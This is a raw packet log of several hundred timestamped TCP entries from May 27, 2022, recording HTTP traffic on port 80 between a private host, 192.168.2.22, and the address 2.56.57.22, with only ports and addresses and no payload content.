May 27, 2022 12:02:27.406910896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406930923 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406939983 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406954050 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406956911 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.406976938 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.406985998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407000065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407001972 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407023907 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407032967 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407046080 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407049894 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407069921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407078028 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407094002 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407097101 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407115936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407124043 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407140017 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407150030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407162905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407174110 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407186031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407191038 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407210112 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407216072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407232046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407242060 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407255888 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407258987 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407279968 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407285929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407301903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407310963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407325983 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407326937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407347918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407356024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407371044 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407373905 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407393932 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407402039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407417059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407424927 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407439947 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407442093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407464027 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407470942 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407485008 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407488108 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407509089 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407517910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407532930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407533884 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407556057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407563925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407579899 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407591105 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407603025 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407608986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407625914 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407632113 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407650948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407659054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407674074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407676935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407697916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407705069 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407721996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407722950 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407744884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407753944 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407769918 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407777071 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407793999 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407804012 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407818079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407821894 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407840967 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407850027 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407862902 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407867908 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407886028 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407893896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407911062 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.407917976 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.407944918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.423410892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.423533916 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434792995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434828043 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434854031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434878111 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434895039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434899092 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434920073 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434922934 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434931040 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434935093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434947014 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434952021 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434957981 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434969902 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434978962 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.434993029 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.434999943 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435017109 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435022116 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435050011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435075998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435097933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435115099 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435120106 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435132027 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435142994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435149908 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435163021 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435170889 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435182095 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435205936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435229063 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435234070 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435251951 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435262918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435271978 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435275078 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435276031 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435291052 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435297966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435305119 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.435322046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435344934 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435368061 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435391903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435412884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435432911 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435497046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435528994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435558081 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435583115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435612917 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435636997 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435659885 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435684919 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435707092 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435730934 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435754061 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435775995 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435798883 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435820103 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435843945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435867071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435889959 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435911894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435935020 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435956001 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.435978889 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436002970 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436027050 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436049938 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436073065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436095953 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436120033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436142921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436166048 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436188936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436213017 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436220884 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.436238050 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436259985 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436283112 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.436284065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436292887 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.436295986 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.436302900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.436306000 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436326027 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.436328888 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436352015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436374903 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436398029 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436422110 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436444998 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436467886 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436506033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436531067 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436554909 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436578989 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436603069 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436625957 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436651945 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436674118 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436697006 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436719894 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436743975 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436767101 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436789989 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436813116 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436836958 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436858892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436882973 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436906099 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436928988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.436952114 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.437278032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437313080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437319040 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437324047 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437328100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437338114 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437346935 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437356949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437369108 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437371969 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437380075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437385082 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437392950 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437397003 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437407017 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437410116 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437414885 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437429905 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437434912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437443018 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437446117 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437454939 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437458992 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437470913 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437532902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437546015 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437550068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437555075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437557936 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437567949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437578917 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437582970 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437645912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437649965 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437659025 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437664032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437669039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437671900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437696934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437710047 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437714100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437727928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437731981 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437733889 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437736988 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437855005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437860012 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437864065 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.437875032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.441560030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.450488091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.450541973 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.461791039 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.461873055 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.462219000 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.462245941 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.462260008 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.462272882 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.462281942 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.462318897 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463670015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463699102 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463721991 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463743925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463746071 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463768005 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463771105 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463795900 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463795900 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463819027 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463838100 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463841915 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463841915 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463851929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463865042 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463872910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463887930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463901043 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463917017 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463921070 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463947058 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463959932 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463969946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463977098 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.463994026 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.463996887 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464018106 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464037895 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464041948 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464061022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464065075 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464073896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464088917 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464107990 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464112997 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464123011 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464137077 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464143038 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464160919 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464171886 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464184046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464189053 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464207888 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464220047 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464231014 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464243889 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464255095 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464265108 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464278936 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464286089 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464302063 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464322090 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464325905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464345932 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464355946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464369059 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464379072 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464394093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464401007 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464417934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464423895 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464442015 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464447021 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464467049 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464471102 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464488029 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464509964 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464519024 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464533091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464550972 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464555979 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464565992 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464580059 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464586020 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464608908 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464617968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464632988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464639902 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464658976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464668989 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464682102 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.464685917 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.464704990 CEST	80	49171	2.56.57.22	192.168.2.22
